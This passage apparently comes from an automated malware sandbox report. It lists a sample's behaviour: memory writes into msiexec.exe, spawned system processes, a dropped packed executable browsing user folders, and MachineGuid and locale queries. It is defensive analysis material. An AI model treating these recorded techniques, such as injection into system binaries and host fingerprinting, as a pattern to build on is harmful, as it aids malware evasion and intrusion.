                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE060000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE061000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE065000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE068000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE069000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE06A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE06B000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 1838FCD010Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: explorer.exe, 00000005.00000000.1530800733.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2794437695.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2786120766.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000005.00000000.1530800733.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2786120766.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2785385821.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000005.00000000.1530800733.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2786120766.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                    Source: explorer.exe, 00000005.00000000.1530800733.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2786120766.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: explorer.exe, 00000005.00000002.2794437695.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2285502408.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2172977303.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0BE6FC cpuid 5_2_0B0BE6FC
                    Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,5_2_0B0C73B0
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0B0CF298
                    Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,5_2_0B0C79D4
                    Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0B0C4800
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_0B0C781C
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0B0C78D0
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_0B0C46A4
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,5_2_0B0BDC48
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,5_2_0DF0DC48
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_0DF146A4
                    Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,5_2_0DF179D4
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0DF178D0
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_0DF1781C
                    Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0DF14800
                    Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,5_2_0DF173B0
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0DF1F298
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,5_2_0DFEDC48
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_0DFF46A4
                    Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,5_2_0DFF79D4
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0DFF78D0
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_0DFF781C
                    Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0DFF4800
                    Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,5_2_0DFF73B0
                    Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0DFFF298
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,5_2_00B5D57D
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,5_2_02BFD57D
                    Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,5_2_0B9AD57D
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: GetProcAddress,GetLocaleInfoW,13_2_00007FFBABA6DC20
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00007FFBABABFA48
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_00007FFBABABF8C0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,13_2_00007FFBABABF478
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,13_2_00007FFBABABF3C4
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: EnumSystemLocalesW,13_2_00007FFBABABF35C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,13_2_00007FFBABABD2E0
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\ucrtbase.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\_ctypes.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-datetime-l1-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l2-1-0.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI37682 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\CZQKSDDMWR VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\Documents\CZQKSDDMWR VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeQueries volume information: C:\Users\user\Music VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF2D8 GetSystemTimeAsFileTime,5_2_0B0CF2D8
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0B53E0 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,5_2_0B0B53E0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72936518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,12_2_00007FF72936518C
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF7853133A8 GetVersionExW,0_2_00007FF7853133A8
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
